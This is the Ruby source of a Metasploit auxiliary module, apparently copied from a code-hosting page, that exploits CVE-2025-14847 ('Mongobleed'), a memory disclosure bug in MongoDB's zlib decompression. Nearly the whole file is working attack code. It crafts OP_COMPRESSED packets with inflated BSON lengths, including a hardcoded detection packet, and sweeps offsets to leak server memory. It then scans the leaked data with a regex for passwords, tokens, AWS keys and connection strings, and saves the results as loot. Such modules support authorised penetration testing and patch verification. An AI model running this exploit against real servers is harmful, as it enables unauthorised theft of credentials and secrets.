Path: blob/master/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.rb
33939 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed',15'Description' => %q{16This module exploits a memory disclosure vulnerability in MongoDB's zlib17decompression handling (CVE-2025-14847). By sending crafted OP_COMPRESSED18messages with inflated BSON document lengths, the server reads beyond the19decompressed buffer and returns leaked memory contents in error messages.2021The vulnerability allows unauthenticated remote attackers to leak server22memory which may contain sensitive information such as credentials, session23tokens, encryption keys, or other application data.24},25'Author' => [26'Alexander Hagenah', # Metasploit module (x.com/xaitax)27'Diego Ledda', # Co-author & review (x.com/jbx81)28'Joe Desimone' # Original discovery and PoC (x.com/dez_)29],30'License' => MSF_LICENSE,31'References' => [32['CVE', '2025-14847'],33['URL', 'https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb'],34['URL', 'https://jira.mongodb.org/browse/SERVER-115508'],35['URL', 'https://x.com/dez_']36],37'DisclosureDate' => '2025-12-19',38'DefaultOptions' => {39'RPORT' => 2701740},41'Notes' => {42'Stability' => [CRASH_SAFE],43'SideEffects' => [IOC_IN_LOGS],44'Reliability' => [REPEATABLE_SESSION]45},46'Actions' => [47['SCAN', { 'Description' => 'Scan and exploit memory leak vulnerability' }],48['CHECK', { 'Description' => 'Quick vulnerability check using Wiz magic packet' }]49],50'DefaultAction' => 'SCAN'51)52)5354register_options(55[56Opt::RPORT(27017),57OptInt.new('MIN_OFFSET', [true, 'Minimum BSON document length offset', 20]),58OptInt.new('MAX_OFFSET', [true, 'Maximum BSON document length offset', 8192]),59OptInt.new('STEP_SIZE', [true, 'Offset increment (higher = faster, less thorough)', 1]),60OptInt.new('BUFFER_PADDING', [true, 'Padding added to buffer size claim', 500]),61OptInt.new('LEAK_THRESHOLD', [true, 'Minimum bytes to report as interesting leak', 10]),62OptBool.new('QUICK_SCAN', [true, 'Quick scan mode - sample key offsets only', false]),63OptInt.new('REPEAT', [true, 'Number of scan passes (more passes = more data)', 1]),64OptBool.new('REUSE_CONNECTION', [true, 'Reuse TCP connection for faster scanning', true])65]66)6768register_advanced_options(69[70OptBool.new('SHOW_ALL_LEAKS', [true, 'Show all leaked fragments, not just large ones', false]),71OptBool.new('SHOW_HEX', [true, 'Show hexdump of leaked data', false]),72OptString.new('SECRETS_PATTERN', [true, 'Regex pattern to detect sensitive data', 'password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth']),73OptBool.new('FORCE_EXPLOIT', [true, 'Attempt exploitation even if version check indicates not vulnerable', false]),74OptInt.new('PROGRESS_INTERVAL', [true, 'Show progress every N offsets (0 to disable)', 500]),75OptBool.new('SAVE_RAW_RESPONSES', [true, 'Save all raw responses for offline analysis', false]),76OptBool.new('SAVE_JSON', [true, 'Save leaked data as JSON with metadata', true])77]78)79end8081# MongoDB Wire Protocol constants82OP_QUERY = 2004 # Legacy query opcode83OP_REPLY = 1 # Legacy reply opcode84OP_COMPRESSED = 201285OP_MSG = 201386COMPRESSOR_ZLIB = 28788# Wiz Research "magic packet" for deterministic vulnerability detection89# This is a crafted OP_COMPRESSED message containing {\"a\": 1} with inflated uncompressedSize90WIZ_MAGIC_PACKET = [91'2a000000', # messageLength (42)92'01000000', # requestID93'00000000', # responseTo94'dc070000', # opCode (OP_COMPRESSED = 2012)95'dd070000', # originalOpcode (OP_MSG = 2013)96'32000000', # uncompressedSize (50 - inflated)97'02', # compressorId (zlib = 2)98'789c636080028144064620050002ca0073' # zlib compressed payload99].join.freeze100101#102# Quick vulnerability check using Wiz Research magic packet103#104def run_check(ip)105print_status("Running vulnerability check against #{ip}:#{rport}...")106107# First get version info108version_info = get_mongodb_version109if version_info110version_str = version_info[:version]111print_status("MongoDB version: #{version_str}")112vuln_status = check_vulnerable_version(version_str)113114case vuln_status115when :patched116print_error("Version #{version_str} is PATCHED - not vulnerable")117return :safe118when :vulnerable, :vulnerable_eol119print_good("Version #{version_str} appears vulnerable, confirming with probe...")120when :unknown121print_warning("Version #{version_str} - vulnerability status unknown, testing...")122end123else124print_warning('Could not determine MongoDB version, testing anyway...')125end126127# Check if zlib compression is enabled128compressors = get_server_compressors129if compressors130print_status("Server compressors: #{compressors.join(', ')}")131unless compressors.include?('zlib')132print_error('Server does not have zlib compression enabled (required for this vulnerability)')133return :safe134end135else136print_warning('Could not determine server compression support, testing anyway...')137end138139# Send the Wiz magic packet to confirm exploitability140print_status('Sending Wiz magic packet to confirm vulnerability...')141result = send_magic_packet_check142case result143when :vulnerable144version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''145print_good("VULNERABLE - Server leaks memory via CVE-2025-14847#{version_msg}")146147# Report the vulnerability148report_vuln(149host: ip,150port: rport,151proto: 'tcp',152name: name,153refs: references,154info: "Confirmed vulnerable via magic packet check#{version_msg}"155)156return :vulnerable157when :safe158print_status('Server did not leak memory (may be patched or zlib disabled)')159return :safe160when :detected161version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''162print_warning("Server appears to be MongoDB#{version_msg}, but could not confirm vulnerability")163print_status('Try running with ACTION=SCAN for full exploitation attempt')164return :detected165else166print_error('Could not determine vulnerability status')167return :unknown168end169end170171#172# Send the Wiz Research magic packet and check for BSON signatures in leaked memory173#174def send_magic_packet_check175connect176packet = [WIZ_MAGIC_PACKET].pack('H*')177sock.put(packet)178179response = recv_mongo_response180disconnect181182return :unknown if response.nil? || response.empty?183184# Check for BSON signatures in response indicating memory leak185# The Wiz template checks for 'BSON' in the zlib-decoded response or raw response186leaked = false187188# Try to decompress and check189begin190if response.length > 25191opcode = response[12, 4].unpack1('V')192if opcode == OP_COMPRESSED193raw = Zlib::Inflate.inflate(response[25..])194leaked = true if raw&.upcase&.include?('BSON')195end196end197rescue Zlib::Error198# Decompression failed, check raw response199end200201# Check raw response for BSON markers202leaked = true if response.upcase.include?('BSON')203204# Also check for other leak indicators (field name errors, type errors)205leaked = true if response =~ /field name '[^']+'/206leaked = true if response =~ /unrecognized.*type/i207208return :vulnerable if leaked209210# If we got a valid MongoDB response but no leak, server might be patched211if response.length >= 16212msg_len = response.unpack1('V')213return :safe if msg_len > 0 && msg_len <= response.length214end215216:detected217rescue ::Rex::ConnectionError, ::Errno::ECONNRESET218:unknown219rescue StandardError => e220vprint_error("Magic packet check error: #{e.message}")221:unknown222ensure223begin224disconnect225rescue StandardError226nil227end228end229230#231# Get server's supported compressors from hello/isMaster response232#233def get_server_compressors234connect235# Send hello command to get server capabilities236response = send_command('admin', { 'hello' => 1, 'compression' => ['zlib', 'snappy', 'zstd'] })237disconnect238239return nil if response.nil?240241# Parse compression field from response242compressors = []243if response =~ /compression.*?\[(.*?)\]/m244compressor_list = ::Regexp.last_match(1)245compressors << 'zlib' if compressor_list.include?('zlib')246compressors << 'snappy' if compressor_list.include?('snappy')247compressors << 'zstd' if compressor_list.include?('zstd')248end249250# Also check raw bytes for compressor strings251compressors << 'zlib' if response.include?('zlib') && !compressors.include?('zlib')252253compressors.empty? ? nil : compressors254rescue StandardError255nil256ensure257begin258disconnect259rescue StandardError260nil261end262end263264def check_vulnerable_version(version_str)265# Parse version for comparison266version_match = version_str.match(/^(\d+\.\d+\.\d+)/)267return :unknown unless version_match268269mongodb_version = Rex::Version.new(version_match[1])270271# Check against vulnerable version ranges per MongoDB JIRA SERVER-115508272if mongodb_version.between?(Rex::Version.new('3.6.0'), Rex::Version.new('3.6.99')) ||273mongodb_version.between?(Rex::Version.new('4.0.0'), Rex::Version.new('4.0.99')) ||274mongodb_version.between?(Rex::Version.new('4.2.0'), Rex::Version.new('4.2.99'))275return :vulnerable_eol276elsif mongodb_version.between?(Rex::Version.new('4.4.0'), Rex::Version.new('4.4.29')) ||277mongodb_version.between?(Rex::Version.new('5.0.0'), Rex::Version.new('5.0.31')) ||278mongodb_version.between?(Rex::Version.new('6.0.0'), Rex::Version.new('6.0.26')) ||279mongodb_version.between?(Rex::Version.new('7.0.0'), Rex::Version.new('7.0.27')) ||280mongodb_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.16')) ||281mongodb_version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.2'))282return :vulnerable283elsif (mongodb_version >= Rex::Version.new('4.4.30') && mongodb_version < Rex::Version.new('5.0.0')) ||284(mongodb_version >= Rex::Version.new('5.0.32') && mongodb_version < Rex::Version.new('6.0.0')) ||285(mongodb_version >= Rex::Version.new('6.0.27') && mongodb_version < Rex::Version.new('7.0.0')) ||286(mongodb_version >= Rex::Version.new('7.0.28') && mongodb_version < Rex::Version.new('8.0.0')) ||287(mongodb_version >= Rex::Version.new('8.0.17') && mongodb_version < Rex::Version.new('8.2.0')) ||288(mongodb_version >= Rex::Version.new('8.2.3'))289return :patched290end291292:unknown293end294295def run_host(ip)296case action.name297when 'CHECK'298run_check(ip)299when 'SCAN'300run_scan(ip)301else302print_error("Unknown action: #{action.name}")303end304end305306def run_scan(ip)307# Version detection and vulnerability check308version_info = get_mongodb_version309310if version_info311version_str = version_info[:version]312print_status("MongoDB version: #{version_str}")313314vuln_status = check_vulnerable_version(version_str)315case vuln_status316when :vulnerable_eol317print_good("Version #{version_str} is VULNERABLE (EOL, no fix available)")318when :vulnerable319print_good("Version #{version_str} is VULNERABLE to CVE-2025-14847")320when :patched321print_warning("Version #{version_str} appears to be PATCHED")322unless datastore['FORCE_EXPLOIT']323print_status('Set FORCE_EXPLOIT=true to attempt exploitation anyway')324return325end326print_status('FORCE_EXPLOIT enabled, continuing...')327when :unknown328print_warning("Version #{version_str} - vulnerability status unknown")329print_status('Proceeding with exploitation attempt...')330end331else332print_warning('Could not determine MongoDB version')333print_status('Proceeding with exploitation attempt...')334end335336# Check compression support337compressors = get_server_compressors338if compressors339print_status("Server compressors: #{compressors.join(', ')}")340unless compressors.include?('zlib')341print_error('Server does not support zlib compression - vulnerability not exploitable')342print_status('The CVE-2025-14847 vulnerability requires zlib compression to be enabled')343return unless datastore['FORCE_EXPLOIT']344345print_status('FORCE_EXPLOIT enabled, continuing anyway...')346end347else348vprint_warning('Could not determine server compression support, proceeding...')349end350351# Perform the memory leak exploitation352exploit_memory_leak(ip, version_info)353end354355def get_mongodb_version356connect357358# Build buildInfo command using legacy OP_QUERY359# This works without authentication on most MongoDB configurations360response = send_command('admin', { 'buildInfo' => 1 })361disconnect362363return nil if response.nil?364365# Parse BSON response to extract version366parse_build_info(response)367rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e368vprint_error("Connection error during version check: #{e.message}")369nil370rescue StandardError => e371vprint_error("Error getting MongoDB version: #{e.message}")372nil373ensure374begin375disconnect376rescue StandardError377nil378end379end380381def send_command(database, command)382# Build BSON document for command383bson_doc = build_bson_document(command)384385# Build OP_QUERY packet386# flags (4 bytes) + fullCollectionName + numberToSkip (4) + numberToReturn (4) + query387collection_name = "#{database}.$cmd\x00"388389query_body = [0].pack('V') # flags390query_body << collection_name # fullCollectionName (null-terminated)391query_body << [0].pack('V') # numberToSkip392query_body << [1].pack('V') # numberToReturn393query_body << bson_doc # query document394395# Build header396request_id = rand(0xFFFFFFFF)397message_length = 16 + query_body.length398header = [message_length, request_id, 0, OP_QUERY].pack('VVVV')399400# Send and receive401sock.put(header + query_body)402403# Read response404response_header = sock.get_once(16, 5)405return nil if response_header.nil? || response_header.length < 16406407msg_len, _req_id, _resp_to, opcode = response_header.unpack('VVVV')408return nil unless opcode == OP_REPLY409410# Read rest of response411remaining = msg_len - 16412return nil if remaining <= 0413414response_body = sock.get_once(remaining, 5)415return nil if response_body.nil?416417# OP_REPLY structure:418# responseFlags (4) + cursorID (8) + startingFrom (4) + numberReturned (4) + documents419return nil if response_body.length < 20420421response_body[20..] # Return documents portion422end423424def build_bson_document(hash)425doc = ''.b426427hash.each do |key, value|428case value429when Integer430if value.between?(-2_147_483_648, 2_147_483_647)431doc << "\x10" # int32 type432doc << "#{key}\x00" # key (cstring)433doc << [value].pack('V') # value434else435doc << "\x12" # int64 type436doc << "#{key}\x00"437doc << [value].pack('q<')438end439when Float440doc << "\x01" # double type441doc << "#{key}\x00"442doc << [value].pack('E')443when String444doc << "\x02" # string type445doc << "#{key}\x00"446doc << [value.length + 1].pack('V') # string length (including null)447doc << "#{value}\x00"448when TrueClass, FalseClass449doc << "\x08" # boolean type450doc << "#{key}\x00"451doc << (value ? "\x01" : "\x00")452end453end454455doc << "\x00" # Document terminator456[doc.length + 4].pack('V') + doc # Prepend document length457end458459def parse_build_info(bson_data)460return nil if bson_data.nil? || bson_data.length < 5461462result = {}463464# Parse BSON document465doc_len = bson_data[0, 4].unpack1('V')466return nil if doc_len > bson_data.length467468pos = 4469while pos < doc_len - 1470type = bson_data[pos].ord471break if type == 0472473pos += 1474475# Read key (cstring)476key_end = bson_data.index("\x00", pos)477break if key_end.nil?478479key = bson_data[pos...key_end]480pos = key_end + 1481482case type483when 0x02 # String484str_len = bson_data[pos, 4].unpack1('V')485value = bson_data[pos + 4, str_len - 1]486pos += 4 + str_len487488case key489when 'version'490result[:version] = value491when 'gitVersion'492result[:git_version] = value493when 'sysInfo'494result[:sys_info] = value495end496when 0x03 # Embedded document497sub_doc_len = bson_data[pos, 4].unpack1('V')498if key == 'buildEnvironment'499# Could parse this for more details500end501pos += sub_doc_len502when 0x10 # int32503pos += 4504when 0x12 # int64505pos += 8506when 0x01 # double507pos += 8508when 0x08 # boolean509pos += 1510when 0x04 # array511arr_len = bson_data[pos, 4].unpack1('V')512pos += arr_len513else514# Unknown type, try to continue515break516end517end518519# Try alternate method if version not found (using hello/isMaster)520result[:version] ||= try_hello_command521522result[:version] ? result : nil523end524525def try_hello_command526begin527response = send_command('admin', { 'hello' => 1 })528return nil if response.nil?529530# Look for version string in response531if response =~ /(\d+\.\d+\.\d+)/532return ::Regexp.last_match(1)533end534rescue StandardError535nil536end537nil538end539540def exploit_memory_leak(ip, version_info)541all_leaked = ''.b542unique_leaks = Set.new543secrets_found = []544leak_details = [] # For JSON export545raw_responses = ''.b if datastore['SAVE_RAW_RESPONSES']546547# Determine offsets to scan548offsets = generate_scan_offsets549total_offsets = offsets.size550repeat_count = datastore['REPEAT']551reuse_conn = datastore['REUSE_CONNECTION']552553if repeat_count > 1554print_status("Running #{repeat_count} scan passes to maximize data collection...")555end556557print_status('Connection reuse enabled for faster scanning') if reuse_conn558559# Track overall progress560progress_interval = datastore['PROGRESS_INTERVAL']561@persistent_sock = nil562connection_errors = 0563max_conn_errors = 55645651.upto(repeat_count) do |pass|566if repeat_count > 1567print_status("=== Pass #{pass}/#{repeat_count} ===")568end569570print_status("Scanning #{total_offsets} offsets (#{datastore['MIN_OFFSET']}-#{datastore['MAX_OFFSET']}, step=#{datastore['STEP_SIZE']}#{datastore['QUICK_SCAN'] ? ', quick mode' : ''})")571572start_time = Time.now573scanned = 0574pass_leaks = 0575576offsets.each do |doc_len|577# Progress reporting578scanned += 1579if progress_interval > 0 && (scanned % progress_interval == 0)580elapsed = Time.now - start_time581rate = scanned / elapsed582remaining = ((total_offsets - scanned) / rate).round583print_status("Progress: #{scanned}/#{total_offsets} (#{(scanned * 100.0 / total_offsets).round(1)}%) - #{unique_leaks.size} leaks found - ETA: #{remaining}s")584end585586found_leak = probe_and_extract(doc_len, {587reuse_conn: reuse_conn,588unique_leaks: unique_leaks,589all_leaked: all_leaked,590secrets_found: secrets_found,591leak_details: leak_details,592raw_responses: raw_responses593})594595if found_leak596pass_leaks += 1597end598599connection_errors = 0 # Reset on success600rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e601connection_errors += 1602close_persistent_connection603vprint_error("Connection error at offset #{doc_len}: #{e.message}")604if connection_errors >= max_conn_errors605print_error("Too many connection errors (#{max_conn_errors}), aborting scan")606break607end608next609rescue ::Timeout::Error610close_persistent_connection611vprint_error("Timeout at offset #{doc_len}")612next613end614615# Pass summary616if repeat_count > 1617print_status("Pass #{pass} complete: #{pass_leaks} new leaks (#{unique_leaks.size} total unique)")618end619end620621# Clean up persistent connection622close_persistent_connection623624# Overall summary and loot storage625if !all_leaked.empty?626# Report found secrets first627if secrets_found.any?628print_line629print_warning('Potential secrets detected:')630secrets_found.uniq.each do |secret|631print_warning(" - #{secret}")632end633end634635print_line636print_good("Total leaked: #{all_leaked.length} bytes")637print_good("Unique fragments: #{unique_leaks.size}")638639# Store leaked data as loot640loot_info = 'MongoDB Memory Disclosure (CVE-2025-14847)'641loot_info += " - Version: #{version_info[:version]}" if version_info&.dig(:version)642643path = store_loot(644'mongodb.memory_leak',645'application/octet-stream',646ip,647all_leaked,648'mongobleed.bin',649loot_info650)651print_good("Leaked data saved to: #{path}")652653# Save as JSON with metadata654if datastore['SAVE_JSON'] && leak_details.any?655json_data = generate_json_report(ip, version_info, leak_details, secrets_found)656json_path = store_loot(657'mongodb.memory_leak.json',658'application/json',659ip,660json_data,661'mongobleed.json',662'MongoDB memory leak data with metadata'663)664print_good("JSON report saved to: #{json_path}")665end666667# Save raw responses if enabled668if datastore['SAVE_RAW_RESPONSES'] && !raw_responses.empty?669raw_path = store_loot(670'mongodb.memory_leak.raw',671'application/octet-stream',672ip,673raw_responses,674'mongobleed_raw.bin',675'Raw MongoDB responses for offline analysis'676)677print_good("Raw responses saved to: #{raw_path}")678end679680# Report the vulnerability681vuln_info = "Leaked #{all_leaked.length} bytes of server memory"682vuln_info += " (MongoDB #{version_info[:version]})" if version_info&.dig(:version)683684report_vuln(685host: ip,686port: rport,687proto: 'tcp',688name: name,689refs: references,690info: vuln_info691)692else693print_status("No data leaked from #{ip}:#{rport}")694end695end696697#698# Probe a single offset and extract leaks699#700def probe_and_extract(doc_len, opts = {})701response = send_probe(doc_len, doc_len + datastore['BUFFER_PADDING'], reuse_connection: opts[:reuse_conn])702return false if response.nil? || response.empty?703704# Save raw response if enabled705opts[:raw_responses] << response if datastore['SAVE_RAW_RESPONSES'] && opts[:raw_responses]706707leaks = extract_leaks(response)708found_new_leak = false709710leaks.each do |data|711next if opts[:unique_leaks].include?(data)712713opts[:unique_leaks].add(data)714opts[:all_leaked] << data715found_new_leak = true716717# Store leak details for JSON export718opts[:leak_details] << {719offset: doc_len,720length: data.length,721data: data,722printable: data.gsub(/[^[:print:]]/, '.'),723timestamp: Time.now.utc.iso8601,724has_secret: check_secrets(data, doc_len, opts[:secrets_found])725}726727# Report large leaks or all if configured728next unless data.length > datastore['LEAK_THRESHOLD'] || datastore['SHOW_ALL_LEAKS']729730preview = data.gsub(/[^[:print:]]/, '.')[0, 80]731print_good("offset=#{doc_len.to_s.ljust(4)} len=#{data.length.to_s.ljust(4)}: #{preview}")732733# Show hex dump if enabled734if datastore['SHOW_HEX'] && !data.empty?735print_hexdump(data)736end737end738739found_new_leak740end741742#743# Generate JSON report with all leak data and metadata744#745def generate_json_report(ip, version_info, leak_details, secrets_found)746report = {747scan_info: {748target: ip,749port: rport,750mongodb_version: version_info&.dig(:version),751scan_time: Time.now.utc.iso8601,752cve: 'CVE-2025-14847'753},754scan_parameters: {755min_offset: datastore['MIN_OFFSET'],756max_offset: datastore['MAX_OFFSET'],757step_size: datastore['STEP_SIZE'],758quick_scan: datastore['QUICK_SCAN'],759repeat_passes: datastore['REPEAT']760},761summary: {762total_leaks: leak_details.size,763total_bytes: leak_details.sum { |l| l[:length] },764secrets_found: secrets_found.size,765unique_offsets: leak_details.map { |l| l[:offset] }.uniq.size766},767secrets: secrets_found.uniq,768leaks: leak_details.map do |leak|769{770offset: leak[:offset],771length: leak[:length],772data_base64: Rex::Text.encode_base64(leak[:data]),773data_printable: leak[:printable][0, 200],774has_secret: leak[:has_secret],775timestamp: leak[:timestamp]776}777end778}779780JSON.pretty_generate(report)781end782783#784# Send probe with optional connection reuse785#786def send_probe(doc_len, buffer_size, reuse_connection: true)787packet = build_probe_packet(doc_len, buffer_size)788789if reuse_connection790# Use persistent connection for speed791begin792ensure_persistent_connection793@persistent_sock.put(packet)794recv_mongo_response_from(@persistent_sock)795rescue StandardError796# Connection failed, try fresh connection797close_persistent_connection798send_probe_fresh(packet)799end800else801send_probe_fresh(packet)802end803end804805def build_probe_packet(doc_len, buffer_size)806# Build minimal BSON content - we lie about total length to trigger the bug807# int32 field "a" with value 1808bson_content = "\x10a\x00\x01\x00\x00\x00".b809810# BSON document with inflated length (this is the key to the exploit)811bson = [doc_len].pack('V') + bson_content812813# Wrap in OP_MSG structure814# flags (4 bytes) + section kind (1 byte) + BSON815op_msg = [0].pack('V') + "\x00".b + bson816817# Compress the OP_MSG payload818compressed_data = Zlib::Deflate.deflate(op_msg)819820# Build OP_COMPRESSED payload821# originalOpcode (4 bytes) + uncompressedSize (4 bytes) + compressorId (1 byte) + compressedData822payload = [OP_MSG].pack('V')823payload << [buffer_size].pack('V') # Claimed uncompressed size (inflated)824payload << [COMPRESSOR_ZLIB].pack('C')825payload << compressed_data826827# MongoDB wire protocol header828# messageLength (4 bytes) + requestID (4 bytes) + responseTo (4 bytes) + opCode (4 bytes)829message_length = 16 + payload.length830header = [message_length, rand(0xFFFFFFFF), 0, OP_COMPRESSED].pack('VVVV')831832header + payload833end834835def ensure_persistent_connection836return if @persistent_sock && !@persistent_sock.closed?837838connect839@persistent_sock = sock840end841842def close_persistent_connection843return unless @persistent_sock844845begin846@persistent_sock.close unless @persistent_sock.closed?847rescue StandardError848nil849end850@persistent_sock = nil851end852853def send_probe_fresh(packet)854response = nil855begin856connect857sock.put(packet)858response = recv_mongo_response859ensure860begin861disconnect862rescue StandardError863nil864end865end866response867end868869def recv_mongo_response870recv_mongo_response_from(sock)871end872873def recv_mongo_response_from(socket)874# Read header first (16 bytes minimum)875header = socket.get_once(16, 2)876return nil if header.nil? || header.length < 4877878msg_len = header.unpack1('V')879return header if msg_len <= 16880881# Read remaining data882remaining = msg_len - header.length883if remaining > 0884data = socket.get_once(remaining, 2)885return header if data.nil?886887header + data888else889header890end891rescue ::Timeout::Error, ::EOFError892nil893end894895#896# Extract leaks with additional patterns (raw bytes, BSON markers, strings)897#898def extract_leaks(response)899return [] if response.nil? || response.length < 25900901leaks = []902903begin904msg_len = response.unpack1('V')905return [] if msg_len > response.length906907# Check if response is compressed (opcode at offset 12)908opcode = response[12, 4].unpack1('V')909910raw = nil911if opcode == OP_COMPRESSED912# Decompress: skip header (16) + originalOpcode (4) + uncompressedSize (4) + compressorId (1) = 25 bytes913begin914raw = Zlib::Inflate.inflate(response[25, msg_len - 25])915rescue Zlib::Error916# Try without decompression917raw = response[25, msg_len - 25]918end919else920# Uncompressed OP_MSG - skip header921raw = response[16, msg_len - 16]922end923924return [] if raw.nil?925926# Extract field names from BSON parsing errors927raw.scan(/field name '([^']*)'/) do |match|928data = match[0]929next if data.nil? || data.empty?930next if ['?', 'a', '$db', 'ping', 'ok', 'errmsg', 'code', 'codeName'].include?(data)931932leaks << data933end934935# Extract type bytes from unrecognized BSON type errors936raw.scan(/(?:unrecognized|unknown|invalid)\s+(?:BSON\s+)?type[:\s]+(\d+)/i) do |match|937type_byte = match[0].to_i & 0xFF938leaks << type_byte.chr if type_byte > 0939end940941# Extract any quoted strings from error messages (broader pattern)942raw.scan(/'([^']{4,})'/) do |match|943data = match[0]944next if data.nil? || data.empty?945next if data.length < 4 # Skip very short strings946next if data =~ /^\$?[a-z]+$/i && data.length < 8 # Skip simple field names947948leaks << data949end950951# Extract printable ASCII sequences from raw bytes (minimum 6 chars)952raw.scan(/[\x20-\x7E]{6,}/) do |match|953next if match.nil? || match.empty?954# Filter out common MongoDB response strings955next if match =~ /^(errmsg|codeName|ok|code|\$db|admin)$/956next if leaks.include?(match)957958leaks << match959end960961# Look for MongoDB connection strings962raw.scan(%r{mongodb(?:\+srv)?://[^\s"'<>]+}) do |match|963leaks << match unless leaks.include?(match)964end965966# Look for potential JSON/BSON fragments967raw.scan(/\{[^{}]{5,100}\}/) do |match|968next if match.nil? || match.empty?969next if match =~ /^\{\s*\}$/ # Skip empty objects970971leaks << match unless leaks.include?(match)972end973rescue Zlib::Error => e974vprint_error("Decompression error: #{e.message}")975rescue StandardError => e976vprint_error("Error extracting leaks: #{e.message}")977end978979leaks.uniq980end981982def check_secrets(data, offset, secrets_found)983pattern = Regexp.new(datastore['SECRETS_PATTERN'], Regexp::IGNORECASE)984return false unless data =~ pattern985986match = ::Regexp.last_match[0]987match_pos = ::Regexp.last_match.begin(0)988989# Extract context around the match (20 chars before and after)990context_start = [match_pos - 20, 0].max991context_end = [match_pos + match.length + 20, data.length].min992context = data[context_start...context_end].gsub(/[^[:print:]]/, '.')993994# Highlight position in context995secret_info = "Pattern '#{match}' at offset #{offset}"996secret_info += " (pos #{match_pos}): ...#{context}..."997998secrets_found << secret_info999print_warning("Secret pattern detected at offset #{offset}: '#{match}' in context: ...#{context}...")1000true1001end10021003def generate_scan_offsets1004min_off = datastore['MIN_OFFSET']1005max_off = datastore['MAX_OFFSET']1006step = datastore['STEP_SIZE']10071008if datastore['QUICK_SCAN']1009# Quick scan mode: sample key offsets that typically yield results1010# Based on common BSON document sizes and memory alignment1011quick_offsets = []10121013# Small offsets (header area)1014quick_offsets += (20..100).step(5).to_a10151016# Power of 2 boundaries (common allocation sizes)1017[128, 256, 512, 1024, 2048, 4096, 8192].each do |boundary|1018next if boundary < min_off || boundary > max_off10191020# Sample around boundaries1021(-10..10).step(2).each do |delta|1022off = boundary + delta1023quick_offsets << off if off >= min_off && off <= max_off1024end1025end10261027# Sample every 128 bytes for broader coverage1028quick_offsets += (min_off..max_off).step(128).to_a10291030quick_offsets.uniq.sort.select { |o| o >= min_off && o <= max_off }1031else1032# Normal scan with step size1033(min_off..max_off).step(step).to_a1034end1035end10361037def print_hexdump(data)1038return if data.nil? || data.empty?10391040# Print hexdump in classic format (16 bytes per line)1041offset = 01042data.bytes.each_slice(16) do |chunk|1043hex_part = chunk.map { |b| '%02x' % b }.join(' ')1044ascii_part = chunk.map { |b| (b >= 32 && b < 127) ? b.chr : '.' }.join10451046# Pad hex part if less than 16 bytes1047hex_part = hex_part.ljust(47)10481049print_line(" #{('%04x' % offset)} #{hex_part} |#{ascii_part}|")1050offset += 1610511052# Limit output to avoid flooding console1053break if offset >= 2561054end1055print_line(' ...') if data.length > 2561056end1057end105810591060